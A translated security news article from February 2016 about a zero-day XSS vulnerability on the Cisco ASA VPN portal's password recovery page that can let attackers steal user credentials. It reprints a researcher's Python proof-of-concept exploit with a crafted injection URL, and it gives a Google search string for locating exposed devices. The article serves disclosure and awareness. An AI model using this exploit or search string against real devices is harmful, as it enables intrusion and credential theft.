February 19, 2016 at 18:49Zero Day XSS Vulnerability Helps Stole Cisco ASA User Credentials
At the beginning of February 2016, information about the critical vulnerability of Cisco ASA firewalls, which allows attackers to carry out remote code execution, got on the network . A few days after fixing it, another serious security bug was discovered in this product.
On February 17, researcher Juan Sacco published information on a zero-day vulnerability, with the help of which, under certain circumstances, an attacker could steal user credentials from a device.
The XSS vulnerability is located on the Cisco ASA VPN Portal Password Recovery page. Theft of user credentials is possible due to incorrect operation of the filtering mechanism for input fields in the form of password recovery (we already wrote about vulnerabilities of this type in Habré ).
To successfully exploit the vulnerability in hidden input fields, it is necessary for the Cisco ASA user to use the FireFox browser to click on a link specifically to the VPN portal password recovery page (it will not be possible to exploit the error in Chrome) and use the key combination Alt + Shift + X .
Juan Sacco published PoC-exploit demonstrating exploitation of this vulnerability:
import string, sys
import socket, httplib
import telnetlib
def run():
try:
Target = sys.argv[1]
Port = int(sys.argv[2])
# Here goes your custom JS agent code
Payload = "alert(1)"
VulnerableURL ="/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
CraftedRequest = VulnerableURL
# Start the connection
connection = httplib.HTTPSConnection(Target)
connection.request('GET', CraftedRequest)
Response = connection.getresponse()
print "Server status response:", Response.status, Response.reason
data = Response.read()
vulnerable = "Target is not vulnerable"
for line in str(data).splitlines():
if "juansacco\\\"" in line:
vulnerable = "Targer is vulnerable"
if vulnerable != "Not vulnerable":
print "Result of the test:", vulnerable
# Find the injection on the response
connection.close()
except Exception,e:
print "Exploit connection closed " + str(e)
if __name__ == '__main__':
print "Cisco VPN ASA Exploit - Zero Day"
print "################################"
print "Author: Juan Sacco - jsacco@exploitpack.com"
try:
Target = sys.argv[1]
Port = sys.argv[2]
except IndexError:
pass
As it turned out later, the submitted code contained typos in the code, and the URL lacked a space. After fixing these shortcomings, exploitation of the vulnerability becomes possible:
In the comments on the exploit, Sacco notes that he transmitted the vulnerability information to Cisco representatives on February 4, 2016, after the publication of the corresponding CVE, on the 16th, the researcher distributed the error information along with the exploit.
In addition, Sacco provides a link to search for vulnerable Cisco ASA devices using Google -
www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F. According to him, the search engine for this request gives more than 18 thousand links (at the moment - more than 24 thousand).You can also find vulnerable devices using the Shodan and Censys search engines. Positive Technologies specialists were able to use them to detect more than 170 thousand vulnerable Cisco ASA devices, more than three thousand of which are located in Russia.
Positive Technologies recommends using specialized protection tools to detect the vulnerability described by Juan Sacco, for example, a security monitoring system and compliance with MaxPatrol 8 standards .
Recently, security researchers have found vulnerabilities not only in Cisco products. For example, at the end of December 2015, information about the backdoor hit the pressin Juniper firewalls. In addition, Fortinet security company was at the center of the scandal - wired passwords for remote access were found in its products .